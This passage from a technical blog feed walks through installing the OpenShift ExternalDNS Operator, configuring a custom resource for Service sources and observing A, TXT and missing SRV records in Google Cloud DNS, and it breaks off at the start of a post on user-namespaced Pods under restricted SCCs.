<span id="cb3-11"><a href="#cb3-11" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Subscription</span></span>
<span id="cb3-12"><a href="#cb3-12" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb3-13"><a href="#cb3-13" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-14"><a href="#cb3-14" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">namespace</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-15"><a href="#cb3-15" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb3-16"><a href="#cb3-16" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> external-dns-operator</span></span>
<span id="cb3-17"><a href="#cb3-17" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">source</span><span class="kw">:</span><span class="at"> redhat-operators</span></span>
<span id="cb3-18"><a href="#cb3-18" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">sourceNamespace</span><span class="kw">:</span><span class="at"> openshift-marketplace</span></span></code></pre></div>
<p>Create the objects:</p>
<pre class="shell"><code>% oc create -f external-dns-operator.yaml
operatorgroup.operators.coreos.com/external-dns-operator-8852w created
subscription.operators.coreos.com/external-dns-operator created</code></pre>
<p>After a short delay (~1 minute for me) the operator installation
should finish. Observe the various Kubernetes objects that
represent the running operator:</p>
<pre class="shell"><code>% oc get -n external-dns-operator all
NAME                                         READY   STATUS    RESTARTS      AGE
pod/external-dns-operator-594b465984-r2pc5   2/2     Running   2 (59s ago)   5m13s

NAME                                            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE
service/external-dns-operator-metrics-service   ClusterIP   172.30.151.142   &lt;none&gt;        8443/TCP   5m15s
service/external-dns-operator-service           ClusterIP   172.30.210.21    &lt;none&gt;        9443/TCP   59s

NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/external-dns-operator   1/1     1            1           5m14s

NAME                                               DESIRED   CURRENT   READY   AGE
replicaset.apps/external-dns-operator-594b465984   1         1         1       5m15s</code></pre>
<h2 id="the-externaldns-custom-resource">The <code>ExternalDNS</code> custom resource <a href="#the-externaldns-custom-resource" class="section">§</a></h2>
<p>Now that the operator is installed, we can define an <code>ExternalDNS</code>
custom resource (CR). The operator creates an ExternalDNS
controller instance for each CR. Here is an example
(<code>externaldns-test.yaml</code>):</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> externaldns.olm.openshift.io/v1alpha1</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> ExternalDNS</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> test</span></span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">domains</span><span class="kw">:</span></span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> </span><span class="fu">filterType</span><span class="kw">:</span><span class="at"> Include </span></span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">matchType</span><span class="kw">:</span><span class="at"> Exact </span></span>
<span id="cb6-9"><a href="#cb6-9" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">name</span><span class="kw">:</span><span class="at"> ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com</span></span>
<span id="cb6-10"><a href="#cb6-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">provider</span><span class="kw">:</span></span>
<span id="cb6-11"><a href="#cb6-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">type</span><span class="kw">:</span><span class="at"> GCP</span></span>
<span id="cb6-12"><a href="#cb6-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">source</span><span class="kw">:</span></span>
<span id="cb6-13"><a href="#cb6-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">type</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb6-14"><a href="#cb6-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">service</span><span class="kw">:</span></span>
<span id="cb6-15"><a href="#cb6-15" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">serviceType</span><span class="kw">:</span></span>
<span id="cb6-16"><a href="#cb6-16" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> LoadBalancer</span></span>
<span id="cb6-17"><a href="#cb6-17" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">labelFilter</span><span class="kw">:</span></span>
<span id="cb6-18"><a href="#cb6-18" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">matchLabels</span><span class="kw">:</span></span>
<span id="cb6-19"><a href="#cb6-19" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb6-20"><a href="#cb6-20" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">fqdnTemplate</span><span class="kw">:</span></span>
<span id="cb6-21"><a href="#cb6-21" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="st">&quot;{{.Name}}.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com&quot;</span></span></code></pre></div>
<p>Breaking down the <code>spec</code>, we see the following fields:</p>
<ul>
<li><p><strong><code>domains</code></strong> gives a rule for which domains this <code>ExternalDNS</code>
controller must manage. In this case, any domain name with a
<em>suffix</em> matching the <code>name</code> subfield will match the rule.</p></li>
<li><p><strong><code>provider</code></strong> specifies the cloud provider—in this case GCP
(Google Cloud). For GCP there is nothing else to configure; the
controller will use the main cluster secret to authenticate to
Google Cloud.</p></li>
<li><p><strong><code>source</code></strong> specifies which kinds of objects the controller will
monitor to determine the DNS records to be created/managed. We
configure the controller to watch Service objects. Further
configuration is specified in subfields:</p>
<ul>
<li><p><strong><code>serviceType</code></strong> restricts the type(s) of Service objects to be
considered.</p></li>
<li><p><strong><code>labelFilter</code></strong> can be set to further restrict the set of
source objects by matching on the <code>label</code> field. In this
example, we only match Service objects with label <code>app: echo</code>.</p></li>
<li><p><strong><code>fqdnTemplate</code></strong> specifies how to derive the fully qualified
DNS name from the Service object.</p></li>
<li><p><strong><code>hostnameAnnotation</code></strong> can be set to <code>Allow</code> to allow the FQDN
to be specified via the
<code>external-dns.alpha.kubernetes.io/hostname</code> annotation on the
Service object. The default value is <code>Ignore</code>, in which case
<code>fqdnTemplate</code> is required.</p></li>
</ul></li>
</ul>
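<p>As a rough illustration of the <code>hostnameAnnotation</code> option, the
fragments below sketch how the CR and a Service might look when the
FQDN comes from the annotation instead of <code>fqdnTemplate</code>. I have
not applied this configuration to the test cluster, and the host
name <code>echo.…</code> is a made-up value for illustration only.</p>
<pre class="sourceCode yaml"><code class="sourceCode yaml"># externaldns-test.yaml (fragment): allow the hostname annotation
spec:
  source:
    type: Service
    hostnameAnnotation: Allow
---
# Service (fragment): request an FQDN via the annotation.
# The "echo" host name is hypothetical.
apiVersion: v1
kind: Service
metadata:
  name: echo-tcp
  labels:
    app: echo
  annotations:
    external-dns.alpha.kubernetes.io/hostname: echo.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com</code></pre>
<p>The annotated name must still fall within a domain admitted by the
<code>domains</code> rule, otherwise the controller will not manage it.</p>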
<p>Aside from <code>type: Service</code>, the <code>ExternalDNS</code> CR also recognises
<code>type: OpenShiftRoute</code>. This type uses <code>Route</code> objects as the
source, creating <code>CNAME</code> records to alias the FQDN derived from the
<code>Route</code> object to the canonical DNS name of the ingress controller.
This isn’t the behaviour I’m looking for, so the rest of this
article focuses on the behaviour for <code>Service</code> sources.</p>
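<p>For comparison, a <code>Route</code>-based source might be declared roughly
as follows. This is a sketch only. The <code>openshiftRouteOptions</code>
subfield and the <code>routerName: default</code> value are assumptions based
on later releases of the operator, and may not apply to the version
used in this article.</p>
<pre class="sourceCode yaml"><code class="sourceCode yaml"># ExternalDNS CR (fragment): use Route objects as the source.
# openshiftRouteOptions and routerName are assumed, not tested here.
spec:
  source:
    type: OpenShiftRoute
    openshiftRouteOptions:
      routerName: default</code></pre>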
<h2 id="creating-the-externaldns-controller">Creating the ExternalDNS controller <a href="#creating-the-externaldns-controller" class="section">§</a></h2>
<p>Now that we have defined an <code>ExternalDNS</code> custom resource, let’s
create it and see what happens. I would like to watch the logs of
the ExternalDNS Operator during this operation.</p>
<p>Earlier we saw that the name of the operator Pod is
<code>pod/external-dns-operator-594b465984-r2pc5</code>. This Pod has two
containers:</p>
<pre class="shell"><code>% oc get -o json -n external-dns-operator \
    pod/external-dns-operator-594b465984-r2pc5 \
    | jq &#39;.status.containerStatuses[].name&#39;
&quot;kube-rbac-proxy&quot;
&quot;operator&quot;</code></pre>
<p>The container named <code>operator</code> is the one we are interested in.
We can watch its log output like so:</p>
<pre class="shell"><code>% oc logs -n external-dns-operator --tail 2 --follow \
    external-dns-operator-594b465984-r2pc5 operator
2022-03-22T04:41:06.625Z        INFO    controller-runtime.manager.controller.external_dns_controller   Starting workers        {&quot;worker count&quot;: 1}
2022-03-22T04:41:06.626Z        INFO    controller-runtime.manager.controller.credentials_secret_controller     Starting workers        {&quot;worker count&quot;: 1}
... (waiting for more output)</code></pre>
<p>Now, in another terminal, create the <code>ExternalDNS</code> CR object:</p>
<pre class="shell"><code>% oc create -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test created</code></pre>
<p>Log output shows the ExternalDNS Operator responding to the
appearance of the <code>externaldns/test</code> CR:</p>
<pre><code>controller-runtime.webhook.webhooks     received request        {&quot;webhook&quot;: &quot;/validate-externaldns-olm-openshift-io-v1alpha1-externaldns&quot;, &quot;UID&quot;: &quot;cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc&quot;, &quot;kind&quot;: &quot;externaldns.olm.openshift.io/v1alpha1, Kind=ExternalDNS&quot;, &quot;resource&quot;: {&quot;group&quot;:&quot;externaldns.olm.openshift.io&quot;,&quot;version&quot;:&quot;v1alpha1&quot;,&quot;resource&quot;:&quot;externaldnses&quot;}}
validating-webhook      validate create {&quot;name&quot;: &quot;test&quot;}
controller-runtime.webhook.webhooks     wrote response  {&quot;webhook&quot;: &quot;/validate-externaldns-olm-openshift-io-v1alpha1-externaldns&quot;, &quot;code&quot;: 200, &quot;reason&quot;: &quot;&quot;, &quot;UID&quot;: &quot;cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc&quot;, &quot;allowed&quot;: true}
external_dns_controller reconciling externalDNS {&quot;externaldns&quot;: &quot;/test&quot;}
…</code></pre>
<p>And if we look in the <em>operand</em> namespace (<code>external-dns</code>) we see
a Pod running:</p>
<pre class="shell"><code>% oc get -n external-dns pod
NAME                                 READY   STATUS    RESTARTS   AGE
external-dns-test-865ffff756-45d44   1/1     Running   0          54s</code></pre>
<p>And if you want to see what an ExternalDNS <em>controller</em> is up to,
you can watch its logs:</p>
<pre class="shell"><code>% oc logs -n external-dns --tail 1 --follow \
    pod/external-dns-test-865ffff756-45d44
time=&quot;2022-03-23T12:26:18Z&quot; level=info msg=&quot;All records are already up to date&quot;
... (waiting for more output)</code></pre>
<h2 id="observing-record-creation">Observing record creation <a href="#observing-record-creation" class="section">§</a></h2>
<p>After creating the ExternalDNS instance, I found the Google Cloud DNS
zone for my cluster and queried its records. How to interact with
the cloud provider depends on which cloud provider the cluster is
hosted on, so I won’t provide details. The existing records are:</p>
<pre><code>ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  NS    21600  ns-gcp-private.googledomains.com.
ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  SOA   21600  ns-gcp-private.googledomains.com.
api.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
api-int.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
*.apps.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     30     35.223.148.37</code></pre>
<div class="note">
<p>This is a <em>private</em> zone specific to my cluster. Some non-routable
addresses appear. I haven’t figured out how to update the records
in the public zone yet. I’m confident this is not a problem with
ExternalDNS. Rather, I put it down to my lack of familiarity with
how to configure it, and with Google Cloud DNS.</p>
</div>
<p>We can see that in addition to the expected <code>NS</code> and <code>SOA</code> records,
there are <code>A</code> records for the API server and a wildcard <code>A</code> record
for the main ingress controller.</p>
<p>Next I create the following Service:</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-tcp</span></span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb14-10"><a href="#cb14-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb14-11"><a href="#cb14-11" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb14-12"><a href="#cb14-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> tcpecho</span></span>
<span id="cb14-13"><a href="#cb14-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb14-14"><a href="#cb14-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<p>Note that it has the <code>app: echo</code> label and has <code>type: LoadBalancer</code>,
satisfying the match criteria of the <code>externaldns/test</code> controller.
Create the service and observe its public IP address:</p>
<pre class="shell"><code>% oc create -f service-echo.yaml
service/echo-tcp created

% oc get service/echo-tcp \
    -o jsonpath=&#39;{.status.loadBalancer}&#39;
{&quot;ingress&quot;:[{&quot;ip&quot;:&quot;35.188.22.139&quot;}]}</code></pre>
<p>After creating the Service, two new records appeared in the zone:</p>
<pre><code>echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     300    35.188.22.139
external-dns-echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  TXT   300    &quot;heritage=external-dns,external-dns/owner=external-dns-test,external-dns/resource=service/test/echo-tcp&quot;</code></pre>
<p>The <code>A</code> record resolves the DNS name to the load balancer’s IP
address. Nothing surprising here.</p>
<p>The <code>TXT</code> record is for the name <code>external-dns-echo-tcp.…</code> and
contains some metadata about the “owner” of the corresponding <code>A</code>
record. Specifically, it identifies the Service object that is the
<em>source</em> of the record. I am not 100% sure, but it seems to also
contain information about the ExternalDNS controller that created
the record.</p>
<p>When I first saw the TXT records, I theorised that the ExternalDNS
controller uses the TXT records to find “obsolete” records and
delete them. This would occur, for example, when the Service is
deleted. Indeed, deleting <code>service/echo-tcp</code> resulted in the
removal of both the <code>A</code> and <code>TXT</code> records.</p>
<h2 id="srv-records-for-loadbalancer-services">SRV records for <code>LoadBalancer</code> Services <a href="#srv-records-for-loadbalancer-services" class="section">§</a></h2>
<p>Kubernetes’ internal DNS system follows a <a href="https://github.com/kubernetes/dns/blob/master/docs/specification.md">DNS-based service
discovery</a> specification. In addition to <code>A</code>/<code>AAAA</code>
records, <code>SRV</code> records are created to locate service endpoints (port
and target DNS name) based on service name and transport protocol
(TCP or UDP). SRV records are an important part of several
protocols as used in the real world, including Kerberos, SIP, LDAP
and XMPP. <code>SRV</code> records have the following shape:</p>
<pre><code>_&lt;service&gt;._&lt;proto&gt;.&lt;domain&gt; &lt;ttl&gt;
    &lt;class&gt; SRV &lt;priority&gt; &lt;weight&gt; &lt;port&gt; &lt;target&gt;</code></pre>
<p>A record to locate an organisation’s LDAP server might look like:</p>
<pre><code>_ldap._tcp.example.net 300
    IN SRV 10 5 389 ldap.corp.example.net</code></pre>
<p>Although the current system has a critical deficiency for
applications that use SRV records and operate on both TCP and UDP
(see my <a href="2020-12-08-k8s-srv-limitation.html">previous blog post</a>),
for most applications it works well. Unfortunately, ExternalDNS
does not follow the DNS spec and does not create SRV records for
Services.</p>
<p>I am not sure why this is the case. Perhaps ExternalDNS even
pre-dates the SRV aspects of the Kubernetes DNS specification. Or
the need might not have been recognised, or was not deemed
sufficiently critical to address.</p>
<p>As it happens, there is <a href="https://github.com/kubernetes-sigs/external-dns/pull/1330">an abandoned pull request</a> from two years
ago that sought to add SRV record generation to ExternalDNS and
bring it in line with the spec. The maintainers seemed receptive,
but the PR author no longer needed the feature and closed it. So I
think there is reason to hope that the feature might eventually make
it into ExternalDNS. Perhaps our team will drive it… we need SRV
records, and it would probably be better to enhance ExternalDNS than
to build our own solution from scratch.</p>
<h2 id="srv-records-for-nodeport-services">SRV records for <code>NodePort</code> services <a href="#srv-records-for-nodeport-services" class="section">§</a></h2>
<p>I said that ExternalDNS does not support SRV records, but there is
one exception to that. ExternalDNS <em>does</em> create SRV records for
Services of <code>type: NodePort</code>. This is not an appropriate solution
for our application, but we can still play with it and get a feel
for how it might work similarly for <code>LoadBalancer</code> Services.</p>
<p>First, we have to modify <code>externaldns/test</code> to add <code>NodePort</code> to the
list of Service types. Update <code>externaldns-test.yaml</code>:</p>
<div class="sourceCode" id="cb19"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb19-1"><a href="#cb19-1" aria-hidden="true" tabindex="-1"></a><span class="at">…</span></span>
<span id="cb19-2"><a href="#cb19-2" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">service</span><span class="kw">:</span></span>
<span id="cb19-3"><a href="#cb19-3" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">serviceType</span><span class="kw">:</span></span>
<span id="cb19-4"><a href="#cb19-4" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> LoadBalancer</span></span>
<span id="cb19-5"><a href="#cb19-5" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> NodePort</span></span>
<span id="cb19-6"><a href="#cb19-6" aria-hidden="true" tabindex="-1"></a><span class="at">…</span></span></code></pre></div>
<p>And apply the updated configuration:</p>
<pre class="shell"><code>% oc replace -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test replaced</code></pre>
<p>Now create a new <code>NodePort</code> Service. <code>service-nodeport.yaml</code>:</p>
<div class="sourceCode" id="cb21"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb21-1"><a href="#cb21-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb21-2"><a href="#cb21-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb21-3"><a href="#cb21-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb21-4"><a href="#cb21-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nodeport</span></span>
<span id="cb21-5"><a href="#cb21-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb21-6"><a href="#cb21-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb21-7"><a href="#cb21-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb21-8"><a href="#cb21-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> NodePort</span></span>
<span id="cb21-9"><a href="#cb21-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb21-10"><a href="#cb21-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb21-11"><a href="#cb21-11" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb21-12"><a href="#cb21-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nodeport</span></span>
<span id="cb21-13"><a href="#cb21-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb21-14"><a href="#cb21-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<pre class="shell"><code>% oc create -f service-nodeport.yaml
service/nodeport created</code></pre>
<p>The ExternalDNS controller log output shows it generating an <code>SRV</code>
record for the Service (wrapped for clarity):</p>
<pre><code>…
time=&quot;…&quot; level=debug msg=&quot;Endpoints generated from service:
default/nodeport:
[ _nodeport._tcp.nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN SRV  0 50 30632
    nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com []
  nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN A  10.0.0.4;10.0.0.5;10.0.128.3;10.0.128.2;10.0.128.4;10.0.0.3 []
]&quot;
…</code></pre>
<p>Unfortunately, the <code>SRV</code> record didn’t actually make it to the
Google Cloud DNS zone. I haven’t worked out why, yet. The <code>A</code>
record does get created; it’s only the <code>SRV</code> record that is missing.
I’ll update this article if/when I work out why the <code>SRV</code> record
goes missing.</p>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="section">§</a></h2>
<p>The ExternalDNS system is intended to automatically manage public
DNS records for Kubernetes-hosted applications. It can
automatically create <code>CNAME</code> records for OpenShift Routes and
<code>A</code>/<code>AAAA</code> records for Services, including <code>LoadBalancer</code> services.
For applications that use <code>A</code>/<code>AAAA</code> and <code>CNAME</code> records, it works
well.</p>
<p>Unfortunately, <code>SRV</code> records are not well supported. Certainly,
ExternalDNS does not meet the needs of typical applications that use
<code>SRV</code> records. Operators of such applications currently have two
options: either manage the records manually (do not want), or
implement the required automation themselves (e.g. in the
application’s <em>operator</em> program).</p>
<p>The best way forward is to implement better support for <code>SRV</code>
records in ExternalDNS itself, so everyone can benefit through
shared effort and maintainership vested in the Kubernetes SIG. I
shall file a ticket and perhaps restart discussions in the
<a href="https://github.com/kubernetes-sigs/external-dns/pull/1330">abandoned pull request</a> with a view to getting this
critical feature on the ExternalDNS roadmap. The extent of
involvement of myself or my team in implementing or driving this
feature work will be determined later.</p>]]></summary>
</entry>
<entry>
    <title>Running Pods in user namespaces without privileged SCCs</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2022-02-02-openshift-user-ns-without-anyuid.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2022-02-02-openshift-user-ns-without-anyuid.html</id>
    <published>2022-02-02T00:00:00Z</published>
    <updated>2022-02-02T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="running-pods-in-user-namespaces-without-privileged-sccs">Running Pods in user namespaces without privileged SCCs</h1>
<p>In <a href="2021-07-22-openshift-systemd-workload-demo.html">previous posts</a> I demonstrated how to run workloads in an
isolated user namespace on OpenShift. There are still some caveats
to doing this. One of these relates to <em>Security Context
Constraints (SCCs)</em>, a security policy mechanism in OpenShift. In
particular, it appeared necessary to admit the Pod via the <code>anyuid</code>
SCC, or one with similar high privileges. This meant that although
the workload itself runs under unprivileged UIDs, the account that
creates the Pod would need privileges to create Pods that run under
arbitrary host UIDs. This is not a desirable situation.</p>
<p>I have investigated that matter further, and it turns out that you
<em>can</em> run a workload in a user namespace even via the default
<code>restricted</code> SCC. But the configuration is not intuitive, and the
reasons <em>why</em> it must be configured that way are convoluted. In
this post I explain the challenges that arise when running a user
namespaced Pod under the <code>restricted</code> SCC, and demonstrate the
solution.</p>
<div class="note">
<p>This post assumes a basic knowledge of Security Context Constraints.
If you are unfamiliar with SCCs, the DevConf.cz 2022 presentation
<em>Introduction to Security Context Constraints</em> (<a href="https://static.sched.com/hosted_files/devconfcz2022/d5/%5BDevConf.CZ%2022%5D%20SCCs%20Presentation.pdf">slides</a>,
<a href="https://www.youtube.com/watch?v=MrYSUmk-nr4">video</a>) by Alberto Losada and Mario Vázquez will bring you up to
speed.</p>
</div>
<h2 id="cluster-configuration">Cluster configuration <a href="#cluster-configuration" class="section">§</a></h2>
<p>I am testing on an OpenShift 4.10 (pre-release) cluster. Some
changes to worker node configuration are required. The following
<code>MachineConfig</code> object defines those changes:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> machineconfiguration.openshift.io/v1</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> MachineConfig</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">machineconfiguration.openshift.io/role</span><span class="kw">:</span><span class="at"> worker</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> idm-4-10</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">kernelArguments</span><span class="kw">:</span></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> systemd.unified_cgroup_hierarchy=1</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> cgroup_no_v1=&quot;all&quot;</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> psi=1</span></span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">config</span><span class="kw">:</span></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ignition</span><span class="kw">:</span></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">version</span><span class="kw">:</span><span class="at"> </span><span class="fl">3.1.0</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">systemd</span><span class="kw">:</span></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">units</span><span class="kw">:</span></span>
